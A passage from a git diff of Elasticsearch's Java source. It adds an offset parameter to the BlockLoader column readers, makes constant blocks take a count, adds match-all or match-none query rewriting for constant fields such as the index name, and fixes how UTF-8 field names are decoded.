(BlockLoader.LongBuilder builder = factory.longsFromDocValues(docs.count() - offset)) { int lastDoc = -1; - for (int i = 0; i < docs.count(); i++) { + for (int i = offset; i < docs.count(); i++) { int doc = docs.get(i); if (doc < lastDoc) { throw new IllegalStateException("docs within same block must be in order"); @@ -173,9 +173,9 @@ private static class Longs extends BlockDocValuesReader { } @Override - public BlockLoader.Block read(BlockFactory factory, Docs docs) throws IOException { - try (BlockLoader.LongBuilder builder = factory.longsFromDocValues(docs.count())) { - for (int i = 0; i < docs.count(); i++) { + public BlockLoader.Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + try (BlockLoader.LongBuilder builder = factory.longsFromDocValues(docs.count() - offset)) { + for (int i = offset; i < docs.count(); i++) { int doc = docs.get(i); if (doc < this.docID) { throw new IllegalStateException("docs within same block must be in order"); @@ -259,10 +259,10 @@ private static class SingletonInts extends BlockDocValuesReader { } @Override - public BlockLoader.Block read(BlockFactory factory, Docs docs) throws IOException { - try (BlockLoader.IntBuilder builder = factory.intsFromDocValues(docs.count())) { + public BlockLoader.Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + try (BlockLoader.IntBuilder builder = factory.intsFromDocValues(docs.count() - offset)) { int lastDoc = -1; - for (int i = 0; i < docs.count(); i++) { + for (int i = offset; i < docs.count(); i++) { int doc = docs.get(i); if (doc < lastDoc) { throw new IllegalStateException("docs within same block must be in order"); @@ -308,9 +308,9 @@ private static class Ints extends BlockDocValuesReader { } @Override - public BlockLoader.Block read(BlockFactory factory, Docs docs) throws IOException { - try (BlockLoader.IntBuilder builder = factory.intsFromDocValues(docs.count())) { - for (int i = 0; i < docs.count(); i++) { + public BlockLoader.Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + try (BlockLoader.IntBuilder builder = factory.intsFromDocValues(docs.count() - offset)) { + for (int i = offset; i < docs.count(); i++) { int doc = docs.get(i); if (doc < this.docID) { throw new IllegalStateException("docs within same block must be in order"); @@ -408,10 +408,10 @@ private static class SingletonDoubles extends BlockDocValuesReader { } @Override - public BlockLoader.Block read(BlockFactory factory, Docs docs) throws IOException { - try (BlockLoader.DoubleBuilder builder = factory.doublesFromDocValues(docs.count())) { + public BlockLoader.Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + try (BlockLoader.DoubleBuilder builder = factory.doublesFromDocValues(docs.count() - offset)) { int lastDoc = -1; - for (int i = 0; i < docs.count(); i++) { + for (int i = offset; i < docs.count(); i++) { int doc = docs.get(i); if (doc < lastDoc) { throw new IllegalStateException("docs within same block must be in order"); @@ -461,9 +461,9 @@ private static class Doubles extends BlockDocValuesReader { } @Override - public BlockLoader.Block read(BlockFactory factory, Docs docs) throws IOException { - try (BlockLoader.DoubleBuilder builder = factory.doublesFromDocValues(docs.count())) { - for (int i = 0; i < docs.count(); i++) { + public BlockLoader.Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + try (BlockLoader.DoubleBuilder builder = factory.doublesFromDocValues(docs.count() - offset)) { + for (int 
i = offset; i < docs.count(); i++) { int doc = docs.get(i); if (doc < this.docID) { throw new IllegalStateException("docs within same block must be in order"); @@ -544,10 +544,10 @@ private static class DenseVectorValuesBlockReader extends BlockDocValuesReader { } @Override - public BlockLoader.Block read(BlockFactory factory, Docs docs) throws IOException { + public BlockLoader.Block read(BlockFactory factory, Docs docs, int offset) throws IOException { // Doubles from doc values ensures that the values are in order - try (BlockLoader.FloatBuilder builder = factory.denseVectors(docs.count(), dimensions)) { - for (int i = 0; i < docs.count(); i++) { + try (BlockLoader.FloatBuilder builder = factory.denseVectors(docs.count() - offset, dimensions)) { + for (int i = offset; i < docs.count(); i++) { int doc = docs.get(i); if (doc < iterator.docID()) { throw new IllegalStateException("docs within same block must be in order"); @@ -645,19 +645,19 @@ private BlockLoader.Block readSingleDoc(BlockFactory factory, int docId) throws if (ordinals.advanceExact(docId)) { BytesRef v = ordinals.lookupOrd(ordinals.ordValue()); // the returned BytesRef can be reused - return factory.constantBytes(BytesRef.deepCopyOf(v)); + return factory.constantBytes(BytesRef.deepCopyOf(v), 1); } else { - return factory.constantNulls(); + return factory.constantNulls(1); } } @Override - public BlockLoader.Block read(BlockFactory factory, Docs docs) throws IOException { - if (docs.count() == 1) { - return readSingleDoc(factory, docs.get(0)); + public BlockLoader.Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + if (docs.count() - offset == 1) { + return readSingleDoc(factory, docs.get(offset)); } - try (BlockLoader.SingletonOrdinalsBuilder builder = factory.singletonOrdinalsBuilder(ordinals, docs.count())) { - for (int i = 0; i < docs.count(); i++) { + try (var builder = factory.singletonOrdinalsBuilder(ordinals, docs.count() - offset)) { + for (int i = offset; i < docs.count(); i++) { int doc = docs.get(i); if (doc < ordinals.docID()) { throw new IllegalStateException("docs within same block must be in order"); @@ -700,9 +700,9 @@ private static class Ordinals extends BlockDocValuesReader { } @Override - public BlockLoader.Block read(BlockFactory factory, Docs docs) throws IOException { - try (BytesRefBuilder builder = factory.bytesRefsFromDocValues(docs.count())) { - for (int i = 0; i < docs.count(); i++) { + public BlockLoader.Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + try (BytesRefBuilder builder = factory.bytesRefsFromDocValues(docs.count() - offset)) { + for (int i = offset; i < docs.count(); i++) { int doc = docs.get(i); if (doc < ordinals.docID()) { throw new IllegalStateException("docs within same block must be in order"); @@ -780,9 +780,9 @@ private static class BytesRefsFromBinary extends BlockDocValuesReader { } @Override - public BlockLoader.Block read(BlockFactory factory, Docs docs) throws IOException { - try (BlockLoader.BytesRefBuilder builder = factory.bytesRefs(docs.count())) { - for (int i = 0; i < docs.count(); i++) { + public BlockLoader.Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + try (BlockLoader.BytesRefBuilder builder = factory.bytesRefs(docs.count() - offset)) { + for (int i = offset; i < docs.count(); i++) { int doc = docs.get(i); if (doc < docID) { throw new IllegalStateException("docs within same block must be in order"); @@ -879,9 +879,9 @@ private static class DenseVectorFromBinary extends 
BlockDocValuesReader { } @Override - public BlockLoader.Block read(BlockFactory factory, Docs docs) throws IOException { - try (BlockLoader.FloatBuilder builder = factory.denseVectors(docs.count(), dimensions)) { - for (int i = 0; i < docs.count(); i++) { + public BlockLoader.Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + try (BlockLoader.FloatBuilder builder = factory.denseVectors(docs.count() - offset, dimensions)) { + for (int i = offset; i < docs.count(); i++) { int doc = docs.get(i); if (doc < docID) { throw new IllegalStateException("docs within same block must be in order"); @@ -963,10 +963,10 @@ private static class SingletonBooleans extends BlockDocValuesReader { } @Override - public BlockLoader.Block read(BlockFactory factory, Docs docs) throws IOException { - try (BlockLoader.BooleanBuilder builder = factory.booleansFromDocValues(docs.count())) { + public BlockLoader.Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + try (BlockLoader.BooleanBuilder builder = factory.booleansFromDocValues(docs.count() - offset)) { int lastDoc = -1; - for (int i = 0; i < docs.count(); i++) { + for (int i = offset; i < docs.count(); i++) { int doc = docs.get(i); if (doc < lastDoc) { throw new IllegalStateException("docs within same block must be in order"); @@ -1012,9 +1012,9 @@ private static class Booleans extends BlockDocValuesReader { } @Override - public BlockLoader.Block read(BlockFactory factory, Docs docs) throws IOException { - try (BlockLoader.BooleanBuilder builder = factory.booleansFromDocValues(docs.count())) { - for (int i = 0; i < docs.count(); i++) { + public BlockLoader.Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + try (BlockLoader.BooleanBuilder builder = factory.booleansFromDocValues(docs.count() - offset)) { + for (int i = offset; i < docs.count(); i++) { int doc = docs.get(i); if (doc < this.docID) { throw new IllegalStateException("docs within same block must be in order"); diff --git a/server/src/main/java/org/elasticsearch/index/mapper/BlockLoader.java b/server/src/main/java/org/elasticsearch/index/mapper/BlockLoader.java index 640a629410451..9c2711eeff333 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/BlockLoader.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/BlockLoader.java @@ -43,7 +43,7 @@ interface ColumnAtATimeReader extends Reader { /** * Reads the values of all documents in {@code docs}. 
*/ - BlockLoader.Block read(BlockFactory factory, Docs docs) throws IOException; + BlockLoader.Block read(BlockFactory factory, Docs docs, int offset) throws IOException; } interface RowStrideReader extends Reader { @@ -149,8 +149,8 @@ public String toString() { */ class ConstantNullsReader implements AllReader { @Override - public Block read(BlockFactory factory, Docs docs) throws IOException { - return factory.constantNulls(); + public Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + return factory.constantNulls(docs.count() - offset); } @Override @@ -183,8 +183,8 @@ public Builder builder(BlockFactory factory, int expectedCount) { public ColumnAtATimeReader columnAtATimeReader(LeafReaderContext context) { return new ColumnAtATimeReader() { @Override - public Block read(BlockFactory factory, Docs docs) { - return factory.constantBytes(value); + public Block read(BlockFactory factory, Docs docs, int offset) { + return factory.constantBytes(value, docs.count() - offset); } @Override @@ -261,8 +261,8 @@ public ColumnAtATimeReader columnAtATimeReader(LeafReaderContext context) throws } return new ColumnAtATimeReader() { @Override - public Block read(BlockFactory factory, Docs docs) throws IOException { - return reader.read(factory, docs); + public Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + return reader.read(factory, docs, offset); } @Override @@ -408,13 +408,13 @@ interface BlockFactory { /** * Build a block that contains only {@code null}. */ - Block constantNulls(); + Block constantNulls(int count); /** * Build a block that contains {@code value} repeated * {@code size} times. */ - Block constantBytes(BytesRef value); + Block constantBytes(BytesRef value, int count); /** * Build a reader for reading keyword ordinals. diff --git a/server/src/main/java/org/elasticsearch/index/mapper/BlockSourceReader.java b/server/src/main/java/org/elasticsearch/index/mapper/BlockSourceReader.java index 72d39b7f59ca2..9d65f0ed8ba2b 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/BlockSourceReader.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/BlockSourceReader.java @@ -469,7 +469,7 @@ public String toString() { /** * Convert a {@link String} into a utf-8 {@link BytesRef}. 
*/ - static BytesRef toBytesRef(BytesRef scratch, String v) { + public static BytesRef toBytesRef(BytesRef scratch, String v) { int len = UnicodeUtil.maxUTF8Length(v.length()); if (scratch.bytes.length < len) { scratch.bytes = new byte[len]; diff --git a/server/src/main/java/org/elasticsearch/index/mapper/BlockStoredFieldsReader.java b/server/src/main/java/org/elasticsearch/index/mapper/BlockStoredFieldsReader.java index f56bfb098ed85..a1f5dc4381f50 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/BlockStoredFieldsReader.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/BlockStoredFieldsReader.java @@ -35,10 +35,10 @@ public boolean canReuse(int startingDocID) { return true; } - private abstract static class StoredFieldsBlockLoader implements BlockLoader { + public abstract static class StoredFieldsBlockLoader implements BlockLoader { protected final String field; - StoredFieldsBlockLoader(String field) { + public StoredFieldsBlockLoader(String field) { this.field = field; } @@ -112,10 +112,10 @@ protected BytesRef toBytesRef(Object v) { } } - private abstract static class Bytes extends BlockStoredFieldsReader { + public abstract static class Bytes extends BlockStoredFieldsReader { private final String field; - Bytes(String field) { + public Bytes(String field) { this.field = field; } diff --git a/server/src/main/java/org/elasticsearch/index/mapper/BooleanScriptBlockDocValuesReader.java b/server/src/main/java/org/elasticsearch/index/mapper/BooleanScriptBlockDocValuesReader.java index a3b10ea901395..3a1a805a25b64 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/BooleanScriptBlockDocValuesReader.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/BooleanScriptBlockDocValuesReader.java @@ -49,10 +49,10 @@ public int docId() { } @Override - public BlockLoader.Block read(BlockLoader.BlockFactory factory, BlockLoader.Docs docs) throws IOException { + public BlockLoader.Block read(BlockLoader.BlockFactory factory, BlockLoader.Docs docs, int offset) throws IOException { // Note that we don't emit falses before trues so we conform to the doc values contract and can use booleansFromDocValues - try (BlockLoader.BooleanBuilder builder = factory.booleans(docs.count())) { - for (int i = 0; i < docs.count(); i++) { + try (BlockLoader.BooleanBuilder builder = factory.booleans(docs.count() - offset)) { + for (int i = offset; i < docs.count(); i++) { read(docs.get(i), builder); } return builder.build(); diff --git a/server/src/main/java/org/elasticsearch/index/mapper/ConstantFieldType.java b/server/src/main/java/org/elasticsearch/index/mapper/ConstantFieldType.java index 5ecb75b09408c..0b246c2492fdb 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/ConstantFieldType.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/ConstantFieldType.java @@ -15,6 +15,8 @@ import org.apache.lucene.search.MultiTermQuery; import org.apache.lucene.search.Query; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.automaton.Automaton; +import org.apache.lucene.util.automaton.CharacterRunAutomaton; import org.elasticsearch.common.lucene.search.Queries; import org.elasticsearch.common.regex.Regex; import org.elasticsearch.core.Nullable; @@ -23,6 +25,7 @@ import java.util.Collection; import java.util.Map; +import java.util.function.Supplier; /** * A {@link MappedFieldType} that has the same value for all documents. 
@@ -135,9 +138,47 @@ public final Query wildcardQuery(String value, boolean caseInsensitive, QueryRew } } + /** + * Returns a query that matches all documents or no documents + * It usually calls {@link #wildcardQuery(String, boolean, QueryRewriteContext)} + * except for IndexFieldType which overrides this method to use its own matching logic. + */ + public Query wildcardLikeQuery(String value, boolean caseInsensitive, QueryRewriteContext context) { + return wildcardQuery(value, caseInsensitive, context); + } + @Override public final boolean fieldHasValue(FieldInfos fieldInfos) { // We consider constant field types to always have value. return true; } + + /** + * Returns the constant value of this field as a string. + * Based on the field type, we need to get it in a different way. + */ + public abstract String getConstantFieldValue(SearchExecutionContext context); + + /** + * Returns a query that matches all documents or no documents + * depending on whether the constant value of this field matches or not + */ + @Override + public Query automatonQuery( + Supplier automatonSupplier, + Supplier characterRunAutomatonSupplier, + @Nullable MultiTermQuery.RewriteMethod method, + SearchExecutionContext context, + String description + ) { + CharacterRunAutomaton compiled = characterRunAutomatonSupplier.get(); + boolean matches = compiled.run(getConstantFieldValue(context)); + if (matches) { + return new MatchAllDocsQuery(); + } else { + return new MatchNoDocsQuery( + "The \"" + context.getFullyQualifiedIndex().getName() + "\" query was rewritten to a \"match_none\" query." + ); + } + } } diff --git a/server/src/main/java/org/elasticsearch/index/mapper/DateScriptBlockDocValuesReader.java b/server/src/main/java/org/elasticsearch/index/mapper/DateScriptBlockDocValuesReader.java index fb97b0f84c50f..0ec899e19a1cd 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/DateScriptBlockDocValuesReader.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/DateScriptBlockDocValuesReader.java @@ -49,10 +49,10 @@ public int docId() { } @Override - public BlockLoader.Block read(BlockLoader.BlockFactory factory, BlockLoader.Docs docs) throws IOException { + public BlockLoader.Block read(BlockLoader.BlockFactory factory, BlockLoader.Docs docs, int offset) throws IOException { // Note that we don't sort the values sort, so we can't use factory.longsFromDocValues - try (BlockLoader.LongBuilder builder = factory.longs(docs.count())) { - for (int i = 0; i < docs.count(); i++) { + try (BlockLoader.LongBuilder builder = factory.longs(docs.count() - offset)) { + for (int i = offset; i < docs.count(); i++) { read(docs.get(i), builder); } return builder.build(); diff --git a/server/src/main/java/org/elasticsearch/index/mapper/DoubleScriptBlockDocValuesReader.java b/server/src/main/java/org/elasticsearch/index/mapper/DoubleScriptBlockDocValuesReader.java index d762acda9f7e4..f01cc65775e6e 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/DoubleScriptBlockDocValuesReader.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/DoubleScriptBlockDocValuesReader.java @@ -49,10 +49,10 @@ public int docId() { } @Override - public BlockLoader.Block read(BlockLoader.BlockFactory factory, BlockLoader.Docs docs) throws IOException { + public BlockLoader.Block read(BlockLoader.BlockFactory factory, BlockLoader.Docs docs, int offset) throws IOException { // Note that we don't sort the values sort, so we can't use factory.doublesFromDocValues - try (BlockLoader.DoubleBuilder builder = 
factory.doubles(docs.count())) { - for (int i = 0; i < docs.count(); i++) { + try (BlockLoader.DoubleBuilder builder = factory.doubles(docs.count() - offset)) { + for (int i = offset; i < docs.count(); i++) { read(docs.get(i), builder); } return builder.build(); diff --git a/server/src/main/java/org/elasticsearch/index/mapper/IgnoredSourceFieldMapper.java b/server/src/main/java/org/elasticsearch/index/mapper/IgnoredSourceFieldMapper.java index d8d8200baac31..812192d79cdce 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/IgnoredSourceFieldMapper.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/IgnoredSourceFieldMapper.java @@ -181,8 +181,12 @@ static NameValue decode(Object field) { int encodedSize = ByteUtils.readIntLE(bytes, 0); int nameSize = encodedSize % PARENT_OFFSET_IN_NAME_OFFSET; int parentOffset = encodedSize / PARENT_OFFSET_IN_NAME_OFFSET; - String name = new String(bytes, 4, nameSize, StandardCharsets.UTF_8); - BytesRef value = new BytesRef(bytes, 4 + nameSize, bytes.length - nameSize - 4); + + String decoded = new String(bytes, 4, bytes.length - 4, StandardCharsets.UTF_8); + String name = decoded.substring(0, nameSize); + // nameSize counts characters, not bytes, so recompute the name's UTF-8 byte length before slicing out the value + int nameByteCount = name.getBytes(StandardCharsets.UTF_8).length; + + BytesRef value = new BytesRef(bytes, 4 + nameByteCount, bytes.length - nameByteCount - 4); return new NameValue(name, parentOffset, value, null); } diff --git a/server/src/main/java/org/elasticsearch/index/mapper/IndexFieldMapper.java b/server/src/main/java/org/elasticsearch/index/mapper/IndexFieldMapper.java index 33c6ff15cccfd..79754a4c63b30 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/IndexFieldMapper.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/IndexFieldMapper.java @@ -10,9 +10,13 @@ package org.elasticsearch.index.mapper; import org.apache.lucene.search.MatchAllDocsQuery; +import org.apache.lucene.search.MatchNoDocsQuery; +import org.apache.lucene.search.MultiTermQuery; import org.apache.lucene.search.Query; import org.apache.lucene.util.BytesRef; import org.elasticsearch.common.Strings; +import org.elasticsearch.common.regex.Regex; +import org.elasticsearch.core.Nullable; import org.elasticsearch.index.fielddata.FieldData; import org.elasticsearch.index.fielddata.FieldDataContext; import org.elasticsearch.index.fielddata.IndexFieldData; @@ -27,6 +31,7 @@ import java.util.Collections; import java.util.List; +import java.util.Locale; public class IndexFieldMapper extends MetadataFieldMapper { @@ -102,6 +107,38 @@ public StoredFieldsSpec storedFieldsSpec() { }; } + @Override + public Query wildcardLikeQuery( + String value, + @Nullable MultiTermQuery.RewriteMethod method, + boolean caseInsensitive, + SearchExecutionContext context + ) { + String indexName = context.getFullyQualifiedIndex().getName(); + return getWildcardLikeQuery(value, caseInsensitive, indexName); + } + + @Override + public Query wildcardLikeQuery(String value, boolean caseInsensitive, QueryRewriteContext context) { + String indexName = context.getFullyQualifiedIndex().getName(); + return getWildcardLikeQuery(value, caseInsensitive, indexName); + } + + private static Query getWildcardLikeQuery(String value, boolean caseInsensitive, String indexName) { + if (caseInsensitive) { + value = value.toLowerCase(Locale.ROOT); + indexName = indexName.toLowerCase(Locale.ROOT); + } + if (Regex.simpleMatch(value, indexName)) { + return new MatchAllDocsQuery(); + } + return new MatchNoDocsQuery("The \"" + indexName + "\" query was rewritten to a \"match_none\" query.");
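The wildcard rewrite above, like the ConstantFieldType.automatonQuery implementation earlier in this change, boils down to one decision: evaluate the pattern once against the shard's constant value and collapse the clause to match-all or match-none. A runnable sketch of that decision using Lucene's automaton utilities; the logs-* pattern and index name below are made-up examples, and the automaton produced by real wildcard parsing may differ:

import org.apache.lucene.util.automaton.Automata;
import org.apache.lucene.util.automaton.Automaton;
import org.apache.lucene.util.automaton.CharacterRunAutomaton;
import org.apache.lucene.util.automaton.Operations;

class ConstantFieldRewriteSketch {
    public static void main(String[] args) {
        // Build "logs-*" as an automaton: the literal prefix followed by any suffix.
        Automaton wildcard = Operations.concatenate(Automata.makeString("logs-"), Automata.makeAnyString());
        CharacterRunAutomaton compiled = new CharacterRunAutomaton(
            Operations.determinize(wildcard, Operations.DEFAULT_DETERMINIZE_WORK_LIMIT)
        );
        String indexName = "logs-2025.07"; // the constant value for this shard
        // true -> MatchAllDocsQuery, false -> MatchNoDocsQuery
        System.out.println(compiled.run(indexName) ? "match_all" : "match_none");
    }
}

Because the field has a single value per index, the per-document automaton check collapses into this single test at rewrite time.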
+ } + + @Override + public String getConstantFieldValue(SearchExecutionContext context) { + return context.getFullyQualifiedIndex().getName(); + } } public IndexFieldMapper() { diff --git a/server/src/main/java/org/elasticsearch/index/mapper/IndexModeFieldMapper.java b/server/src/main/java/org/elasticsearch/index/mapper/IndexModeFieldMapper.java index 9708753926e1d..82960224e13bf 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/IndexModeFieldMapper.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/IndexModeFieldMapper.java @@ -57,6 +57,11 @@ protected boolean matches(String pattern, boolean caseInsensitive, QueryRewriteC return Regex.simpleMatch(pattern, indexMode, caseInsensitive); } + @Override + public String getConstantFieldValue(SearchExecutionContext context) { + return context.getIndexSettings().getMode().getName(); + } + @Override public Query existsQuery(SearchExecutionContext context) { return new MatchAllDocsQuery(); diff --git a/server/src/main/java/org/elasticsearch/index/mapper/IpScriptBlockDocValuesReader.java b/server/src/main/java/org/elasticsearch/index/mapper/IpScriptBlockDocValuesReader.java index 48d78129b8781..b232a8e1fc45a 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/IpScriptBlockDocValuesReader.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/IpScriptBlockDocValuesReader.java @@ -49,10 +49,10 @@ public int docId() { } @Override - public BlockLoader.Block read(BlockLoader.BlockFactory factory, BlockLoader.Docs docs) throws IOException { + public BlockLoader.Block read(BlockLoader.BlockFactory factory, BlockLoader.Docs docs, int offset) throws IOException { // Note that we don't pre-sort our output so we can't use bytesRefsFromDocValues - try (BlockLoader.BytesRefBuilder builder = factory.bytesRefs(docs.count())) { - for (int i = 0; i < docs.count(); i++) { + try (BlockLoader.BytesRefBuilder builder = factory.bytesRefs(docs.count() - offset)) { + for (int i = offset; i < docs.count(); i++) { read(docs.get(i), builder); } return builder.build(); diff --git a/server/src/main/java/org/elasticsearch/index/mapper/KeywordFieldMapper.java b/server/src/main/java/org/elasticsearch/index/mapper/KeywordFieldMapper.java index f8af7043b13dd..594b27f029901 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/KeywordFieldMapper.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/KeywordFieldMapper.java @@ -24,6 +24,7 @@ import org.apache.lucene.index.IndexReader; import org.apache.lucene.index.LeafReaderContext; import org.apache.lucene.index.MultiTerms; +import org.apache.lucene.index.Term; import org.apache.lucene.index.Terms; import org.apache.lucene.index.TermsEnum; import org.apache.lucene.search.MultiTermQuery; @@ -31,6 +32,7 @@ import org.apache.lucene.util.BytesRef; import org.apache.lucene.util.automaton.Automata; import org.apache.lucene.util.automaton.Automaton; +import org.apache.lucene.util.automaton.CharacterRunAutomaton; import org.apache.lucene.util.automaton.CompiledAutomaton; import org.apache.lucene.util.automaton.CompiledAutomaton.AUTOMATON_TYPE; import org.apache.lucene.util.automaton.Operations; @@ -51,6 +53,7 @@ import org.elasticsearch.index.fielddata.SourceValueFetcherSortedBinaryIndexFieldData; import org.elasticsearch.index.fielddata.StoredFieldSortedBinaryIndexFieldData; import org.elasticsearch.index.fielddata.plain.SortedSetOrdinalsIndexFieldData; +import org.elasticsearch.index.query.AutomatonQueryWithDescription; import 
org.elasticsearch.index.query.SearchExecutionContext; import org.elasticsearch.index.similarity.SimilarityProvider; import org.elasticsearch.script.Script; @@ -82,6 +85,7 @@ import java.util.Map; import java.util.Objects; import java.util.Set; +import java.util.function.Supplier; import static org.apache.lucene.index.IndexWriter.MAX_TERM_LENGTH; import static org.elasticsearch.core.Strings.format; @@ -509,6 +513,7 @@ public static final class KeywordFieldType extends StringFieldType { private final IndexMode indexMode; private final IndexSortConfig indexSortConfig; private final boolean hasDocValuesSkipper; + private final String originalName; public KeywordFieldType( String name, @@ -537,6 +542,7 @@ public KeywordFieldType( this.indexMode = builder.indexMode; this.indexSortConfig = builder.indexSortConfig; this.hasDocValuesSkipper = DocValuesSkipIndexType.NONE.equals(fieldType.docValuesSkipIndexType()) == false; + this.originalName = isSyntheticSource ? name + "._original" : null; } public KeywordFieldType(String name, boolean isIndexed, boolean hasDocValues, Map meta) { @@ -551,6 +557,7 @@ public KeywordFieldType(String name, boolean isIndexed, boolean hasDocValues, Ma this.indexMode = IndexMode.STANDARD; this.indexSortConfig = null; this.hasDocValuesSkipper = false; + this.originalName = null; } public KeywordFieldType(String name) { @@ -576,6 +583,7 @@ public KeywordFieldType(String name, FieldType fieldType) { this.indexMode = IndexMode.STANDARD; this.indexSortConfig = null; this.hasDocValuesSkipper = DocValuesSkipIndexType.NONE.equals(fieldType.docValuesSkipIndexType()) == false; + this.originalName = null; } public KeywordFieldType(String name, NamedAnalyzer analyzer) { @@ -590,6 +598,7 @@ public KeywordFieldType(String name, NamedAnalyzer analyzer) { this.indexMode = IndexMode.STANDARD; this.indexSortConfig = null; this.hasDocValuesSkipper = false; + this.originalName = null; } @Override @@ -1042,6 +1051,26 @@ public IndexSortConfig getIndexSortConfig() { public boolean hasDocValuesSkipper() { return hasDocValuesSkipper; } + + @Override + public Query automatonQuery( + Supplier automatonSupplier, + Supplier characterRunAutomatonSupplier, + @Nullable MultiTermQuery.RewriteMethod method, + SearchExecutionContext context, + String description + ) { + return new AutomatonQueryWithDescription(new Term(name()), automatonSupplier.get(), description); + } + + /** + * The name used to store "original" values that have been ignored + * by {@link KeywordFieldType#ignoreAbove()} so that they can be rebuilt + * for synthetic source. + */ + public String originalName() { + return originalName; + } } private final boolean indexed; @@ -1094,7 +1123,7 @@ private KeywordFieldMapper( this.useDocValuesSkipper = useDocValuesSkipper; this.offsetsFieldName = offsetsFieldName; this.indexSourceKeepMode = indexSourceKeepMode; - this.originalName = isSyntheticSource ?
fullPath() + "._original" : null; + this.originalName = mappedFieldType.originalName(); } @Override @@ -1154,7 +1183,7 @@ private boolean indexValue(DocumentParserContext context, XContentString value) // Save a copy of the field so synthetic source can load it var utfBytes = value.bytes(); var bytesRef = new BytesRef(utfBytes.bytes(), utfBytes.offset(), utfBytes.length()); - context.doc().add(new StoredField(originalName(), bytesRef)); + context.doc().add(new StoredField(originalName, bytesRef)); } return false; } @@ -1265,15 +1294,6 @@ boolean hasNormalizer() { return normalizerName != null; } - /** - * The name used to store "original" that have been ignored - * by {@link KeywordFieldType#ignoreAbove()} so that they can be rebuilt - * for synthetic source. - */ - private String originalName() { - return originalName; - } - @Override protected SyntheticSourceSupport syntheticSourceSupport() { if (hasNormalizer()) { @@ -1322,7 +1342,7 @@ protected BytesRef preserve(BytesRef value) { } if (fieldType().ignoreAbove != Integer.MAX_VALUE) { - layers.add(new CompositeSyntheticFieldLoader.StoredFieldLayer(originalName()) { + layers.add(new CompositeSyntheticFieldLoader.StoredFieldLayer(originalName) { @Override protected void writeValue(Object value, XContentBuilder b) throws IOException { BytesRef ref = (BytesRef) value; diff --git a/server/src/main/java/org/elasticsearch/index/mapper/KeywordScriptBlockDocValuesReader.java b/server/src/main/java/org/elasticsearch/index/mapper/KeywordScriptBlockDocValuesReader.java index cfc7045a55513..220bba3d3c079 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/KeywordScriptBlockDocValuesReader.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/KeywordScriptBlockDocValuesReader.java @@ -51,10 +51,10 @@ public int docId() { } @Override - public BlockLoader.Block read(BlockLoader.BlockFactory factory, BlockLoader.Docs docs) throws IOException { + public BlockLoader.Block read(BlockLoader.BlockFactory factory, BlockLoader.Docs docs, int offset) throws IOException { // Note that we don't pre-sort our output so we can't use bytesRefsFromDocValues - try (BlockLoader.BytesRefBuilder builder = factory.bytesRefs(docs.count())) { - for (int i = 0; i < docs.count(); i++) { + try (BlockLoader.BytesRefBuilder builder = factory.bytesRefs(docs.count() - offset)) { + for (int i = offset; i < docs.count(); i++) { read(docs.get(i), builder); } return builder.build(); diff --git a/server/src/main/java/org/elasticsearch/index/mapper/LongScriptBlockDocValuesReader.java b/server/src/main/java/org/elasticsearch/index/mapper/LongScriptBlockDocValuesReader.java index 0a1a8a86154ab..9c947a17de7b6 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/LongScriptBlockDocValuesReader.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/LongScriptBlockDocValuesReader.java @@ -49,10 +49,10 @@ public int docId() { } @Override - public BlockLoader.Block read(BlockLoader.BlockFactory factory, BlockLoader.Docs docs) throws IOException { + public BlockLoader.Block read(BlockLoader.BlockFactory factory, BlockLoader.Docs docs, int offset) throws IOException { // Note that we don't pre-sort our output so we can't use longsFromDocValues - try (BlockLoader.LongBuilder builder = factory.longs(docs.count())) { - for (int i = 0; i < docs.count(); i++) { + try (BlockLoader.LongBuilder builder = factory.longs(docs.count() - offset)) { + for (int i = offset; i < docs.count(); i++) { read(docs.get(i), builder); } return builder.build(); diff --git 
